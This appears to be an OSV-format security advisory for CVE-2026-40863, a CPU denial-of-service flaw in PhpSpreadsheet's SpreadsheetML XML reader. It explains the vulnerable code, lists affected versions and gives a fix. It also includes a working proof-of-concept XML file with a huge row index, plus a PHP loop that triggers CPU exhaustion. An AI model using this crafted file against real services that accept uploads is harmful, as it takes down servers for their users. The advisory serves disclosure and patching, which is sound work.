GHSA-84wq-86v6-x5j6

Source

https://github.com/advisories/GHSA-84wq-86v6-x5j6

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-84wq-86v6-x5j6/GHSA-84wq-86v6-x5j6.json

JSON Data

https://api.osv.dev/v1/vulns/GHSA-84wq-86v6-x5j6

Aliases

CVE-2026-40863

Published

2026-04-29T20:23:27Z

Modified

2026-05-13T16:57:37.364731Z

Severity

7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator

Summary

PhpSpreadsheet has CPU Denial of Service via Unbounded Row Index in SpreadsheetML XML Reader

Details

Summary

The SpreadsheetML XML reader (Reader\Xml) does not validate the ss:Index row attribute against the maximum allowed row count (AddressRange::MAX_ROW = 1,048,576). An attacker can craft a SpreadsheetML XML file with ss:Index="999999999" on a <Row> element, which inflates the internal cachedHighestRow to ~1 billion. Any subsequent call to getRowIterator() without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service.

Details

In src/PhpSpreadsheet/Reader/Xml.php, the loadSpreadsheetFromFile method processes <Row> elements:

// Xml.php:397-402
if (isset($row_ss['Index'])) {
    $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW
}
if (isset($row_ss['Hidden'])) {
    $rowVisible = ((string) $row_ss['Hidden']) !== '1';
    $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible);
}

The $rowID value read from ss:Index is cast to int with no upper bound check. It is then passed to getRowDimension():

// Worksheet.php:1342-1351
public function getRowDimension(int $row): RowDimension
{
    if (!isset($this->rowDimensions[$row])) {
        $this->rowDimensions[$row] = new RowDimension($row);
        $this->cachedHighestRow = max($this->cachedHighestRow, $row);
    }
    return $this->rowDimensions[$row];
}

This inflates cachedHighestRow to the attacker-controlled value. Additionally, at line 412, $cellRange = $columnID . $rowID is constructed and passed to getCell(), which calls createNewCell() (Worksheet.php:1294) and also sets cachedHighestRow.

The RowIterator constructor uses getHighestRow() as its default end row:

// RowIterator.php:84-88
public function resetEnd(?int $endRow = null): static
{
    $this->endRow = $endRow ?: $this->subject->getHighestRow();
    return $this;
}

With cachedHighestRow at ~1 billion, iterating over rows causes CPU exhaustion. The DefaultReadFilter provides no protection — it returns true for all cells.

Even without the Hidden attribute, any cell data within the row still uses the inflated $rowID at line 412, so the ss:Hidden attribute is not required to trigger the vulnerability.

PoC

Create poc.xml:

<?xml version="1.0"?>
<?mso-application progid="Excel.Sheet"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet">
 <Worksheet ss:Name="Sheet1">
  <Table>
   <Row ss:Index="999999999" ss:Hidden="1"/>
   <Row><Cell><Data ss:Type="String">test</Data></Cell></Row>
  </Table>
 </Worksheet>
</Workbook>

Load and iterate:

<?php
require 'vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;

$reader = IOFactory::createReader('Xml');
$spreadsheet = $reader->load('poc.xml');
$sheet = $spreadsheet->getActiveSheet();

echo "Highest row: " . $sheet->getHighestRow() . "\n";
// Outputs: Highest row: 1000000000

// This loop will attempt ~1 billion iterations → CPU exhaustion
foreach ($sheet->getRowIterator() as $row) {
    // Never completes
}

Impact

Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by:

Exhausting server CPU with a single small XML file (~300 bytes)
Blocking the PHP worker process, potentially affecting all concurrent users
Triggering PHP maxexecutiontime limits that still consume resources before killing the process

The attack requires no authentication — only the ability to upload or cause the application to process a crafted SpreadsheetML file.

Recommended Fix

Add MAX_ROW validation after reading the ss:Index attribute in src/PhpSpreadsheet/Reader/Xml.php:

// After line 398:
if (isset($row_ss['Index'])) {
    $rowID = (int) $row_ss['Index'];
    if ($rowID > AddressRange::MAX_ROW) {
        $rowID = AddressRange::MAX_ROW;
    }
}

Add the necessary import at the top of the file:

use PhpOffice\PhpSpreadsheet\Cell\AddressRange;

The same validation should also be applied to the ss:Index attribute on <Cell> elements (line 409) for the column dimension.

Database specific

{
    "cwe_ids": [
        "CWE-400",
        "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-29T20:23:27Z",
    "nvd_published_at": "2026-05-12T22:16:33Z",
    "severity": "HIGH"
}

References

Affected packages

Packagist

phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

4.0.0

Fixed

5.7.0

Affected versions

4.*

4.0.0

4.1.0

4.2.0

4.3.0

4.3.1

4.4.0

4.5.0

5.*

5.0.0

5.1.0

5.2.0

5.3.0

5.4.0

5.5.0

5.6.0

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-84wq-86v6-x5j6/GHSA-84wq-86v6-x5j6.json"

last_known_affected_version_range

"<= 5.6.0"

phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

3.3.0

Fixed

3.10.5

Affected versions

3.*

3.3.0

3.4.0

3.5.0

3.6.0

3.7.0

3.8.0

3.9.0

3.9.1

3.9.2

3.9.3

3.10.0

3.10.1

3.10.2

3.10.3

3.10.4

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-84wq-86v6-x5j6/GHSA-84wq-86v6-x5j6.json"

last_known_affected_version_range

"<= 3.10.4"

phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

2.2.0

Fixed

2.4.5

Affected versions

2.*

2.2.0

2.2.1

2.2.2

2.3.0

2.3.2

2.3.3

2.3.4

2.3.5

2.3.6

2.3.7

2.3.8

2.3.9

2.3.10

2.4.0

2.4.1

2.4.2

2.4.3

2.4.4

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-84wq-86v6-x5j6/GHSA-84wq-86v6-x5j6.json"

last_known_affected_version_range

"<= 2.4.4"

phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

2.0.0

Fixed

2.1.16

Affected versions

2.*

2.0.0

2.1.0

2.1.1

2.1.3

2.1.4

2.1.5

2.1.6

2.1.7

2.1.8

2.1.9

2.1.10

2.1.11

2.1.12

2.1.13

2.1.14

2.1.15

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-84wq-86v6-x5j6/GHSA-84wq-86v6-x5j6.json"

last_known_affected_version_range

"<= 2.1.15"

phpoffice/phpspreadsheet

Package

Name: phpoffice/phpspreadsheet
Purl: pkg:composer/phpoffice/phpspreadsheet

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

1.30.4

Affected versions

1.*

1.0.0-beta

1.0.0-beta2

1.0.0

1.1.0

1.2.0

1.2.1

1.3.0

1.3.1

1.4.0

1.4.1

1.5.0

1.5.1

1.5.2

1.6.0

1.7.0

1.8.0

1.8.1

1.8.2

1.9.0

1.10.0

1.10.1

1.11.0

1.12.0

1.13.0

1.14.0

1.14.1

1.15.0

1.16.0

1.17.0

1.17.1

1.18.0

1.19.0

1.20.0

1.21.0

1.22.0

1.23.0

1.24.0

1.24.1

1.25.0

1.25.1

1.25.2

1.26.0

1.27.0

1.27.1

1.28.0

1.29.0

1.29.1

1.29.2

1.29.4

1.29.5

1.29.6

1.29.7

1.29.8

1.29.9

1.29.10

1.29.11

1.29.12

1.30.0

1.30.1

1.30.2

1.30.3

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-84wq-86v6-x5j6/GHSA-84wq-86v6-x5j6.json"

last_known_affected_version_range

"<= 1.30.3"